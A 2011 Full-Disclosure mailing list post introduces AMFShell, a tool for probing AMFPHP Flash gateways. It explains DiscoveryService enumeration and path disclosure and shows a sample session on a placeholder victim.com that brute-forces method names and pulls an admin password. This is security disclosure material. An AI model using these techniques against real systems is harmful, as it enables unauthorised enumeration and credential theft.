[Date Prev][Date Next][Thread Prev][Thread Next][Date Index][Thread Index]

[Full-disclosure] Action Message Format (AMF) Shell

To: "full-disclosure@xxxxxxxxxxxxxxxxx" <full-disclosure@xxxxxxxxxxxxxxxxx>
Subject: [Full-disclosure] Action Message Format (AMF) Shell
From: George Hedfors <George.Hedfors@xxxxxxxxxxxx>
Date: Sat, 30 Apr 2011 23:30:32 +0200

>From my blog at 
>http://george.hedfors.com/content/action-message-format-amf-shell. Please 
>visit that url for updates

Introduction
Action Message Format (AMF) is a binary format used to serialize ActionScript 
objects. It is used primarily to exchange data between an Adobe Flash 
application and a remote service, usually over the internet.

Background
When I was auditing the security of a content management system based on Flash, 
I quickly realized that the information that I could dig out by hand from the 
binary communication wouldn't take me the whole way. Burp Suite Pro, which I 
was using at the time has a neat feature that decodes the serialized 
communication on the fly. However, it doesn't provide an adequate way to 
manipulate. Therefore, I started investigating into possibilities of making a 
tool that could in fact communicate freely with the AMF gateway using its own 
protocol.

After some investigation, I found PyAMF, which is a Python implementation of 
the AMF messaging protocol. The tool that I started making then turned into 
something that I'd like to call, a AMF Shell.

AMFPHP Vulnerabilities
There are a number of vulnerabilities that are standard with AMFPHP, which was 
the gateway software that I've constructed AMFShell around. By default, there 
is a so called "Service Browser" installed that allows you to to pretty much 
the same as my AMF Shell. It's typically installed in a path such as:

http://www.victim.com/amfphp/browser

However, most administrators are aware of this vulnerability and have removed 
the Flash page. What they usually haven't removed is the service files 
associated with it. They are typically located at:

http://www.victim.com/amfphp/services/amfphp/DiscoveryServices.php

DiscoveryService.php is the AMF class that the Service Browser calls on to do 
it's magic. This class can still be contacted using AMFShell for example. The 
vulnerability resides in the fact that the DiscoveryService class has methods 
that enumerates other local services and classes and returns them.

The other vulnerability in AMFPHP is that it discloses the local path in case 
one is trying to use a non-existent class or method. What you'll get is 
something like this, when trying to access a class called 'asdf':

The class {asdf} could not be found under the class path 
{/mnt/target03/350439/508174/www/web/content/amfphp/services/asdf.php}

Yes, I've also been investigating into the possibility of directory traversal 
but have so far been unsuccessful. One of the reasons is that it converts dots 
'.' into slashes and is not subjected to hex or any other encoding.

Available commands
brute
Launches a brute force attack for method names to the selected class using 
common names.
call methodName(args,..)
Call a method from the current class. Arguments
may be single arguments or arrays:
call methodName(['array','of','stuff'])
call methodName(arg1,arg2,arg3)
list
Lists available classes
use service.className
Change current class

Usage example
$ ./amfshell.py http://www.victim.com/amfphp/gateway.php
[+] AMFPHP exists and appears to be vulnerable to 'DiscoveryService'.
[*] To disable 'DiscoveryServices', remove 
/homepages/16/d264/htdocs/services/amfphp/DiscoveryService.php

Welcome to Action Message Formate Shell by George Hedfors. Type 'help' for 
command list.

(amfphp.DiscoveryService) list
amfphp.DiscoveryService
UserService
(amfphp.DiscoveryService) use UserService
(UserService) brute
This may seriously harm your environment, are you sure? (y/N): y
Testing 539 methods...
Missing argument 1 for UserService::addUser()
Missing argument 1 for UserService::getUser()
Missing argument 1 for UserService::updateUser()
(UserService) call getUser(admin)
{"username": "admin", "password": "admin123", "id": "1"}

What could possibly go wrong from here? :)

Known bugs
Some pages return HTML content instead of AMF when calling a method. This 
cannot be parsed by PyAMF but can easily be viewed using a sniffing tool, such 
as Wireshark.

George Hedfors
IT- & Information Security Consultant

Cybercom Sweden East AB
Lindhagensgatan 126   Box 30154   SE-104 25 Stockholm

Phone +46 8 726 75 00   Fax +46 8 19 33 22

http://www.cybercomgroup.com

http://george.hedfors.com/
http://www.linkedin.com/in/georgehedfors

Attachment: amfshell-0.23.tgz
Description: amfshell-0.23.tgz

_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/

Prev by Date: Re: [Full-disclosure] psnhack - playstation network hack
Next by Date: Re: [Full-disclosure] Pangolin spam
Previous by thread: Re: [Full-disclosure] psnhack - playstation network hack
Next by thread: Re: [Full-disclosure] Pangolin spam
Index(es):
- Date
- Thread